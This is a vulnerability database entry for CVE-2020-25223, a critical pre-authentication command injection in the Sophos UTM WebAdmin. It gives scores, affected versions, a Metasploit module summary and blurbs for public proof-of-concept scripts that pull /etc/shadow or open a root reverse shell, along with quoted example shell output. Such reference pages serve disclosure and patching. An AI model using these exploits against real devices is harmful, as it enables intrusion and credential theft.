10
CVSSv2

CVE-2020-25223

Published: 25/09/2020 Updated: 17/10/2023
CVSS v2 Base Score: 10 | Impact Score: 10 | Exploitability Score: 10
CVSS v3 Base Score: 9.8 | Impact Score: 5.9 | Exploitability Score: 3.9
VMScore: 891
Vector: AV:N/AC:L/Au:N/C:C/I:C/A:C

Vulnerability Summary

A remote code execution vulnerability exists in the WebAdmin of Sophos SG UTM before v9.705 MR5, v9.607 MR7, and v9.511 MR11

Vulnerability Trend

Vulnerable Product Search on Vulmon Subscribe to Product

sophos unified threat management

sophos unified threat management 9.511

sophos unified threat management 9.607

sophos unified threat management 9.705

Exploits

This Metasploit module exploits an SID-based command injection in Sophos UTM's WebAdmin interface to execute shell commands as the root user ...

Github Repositories

CVE-2020-25223 A PoC script for testing CVE-2020-25223 against an affected Sophos UTM Given an IP address, the script attempts to download a copy of the devices /etc/shadow file Original research: wwwatrediscom/blog/2021/8/18/sophos-utm-cve-2020-25223

CVE-2020-25223

sophucked CVE-2020-25223 RCE PoC, gets reverse shell Pre-auth Implemented this quickly as it was needed to unify some threat magnets Example Use: # python sophuckedpy xxxx:4443 xxxx 80 (+) starting handler on port 80 (+) Sending callback to xxxx:80 (+) connection from xxxx (+) pop thy shell! bash: no job control in this shell utm:/var/confd # unset HISTF

CVE-2020-25223 A PoC script for testing CVE-2020-25223 against an affected Sophos UTM Given an IP address, the script attempts to download a copy of the devices /etc/shadow file Original research: wwwatrediscom/blog/2021/8/18/sophos-utm-cve-2020-25223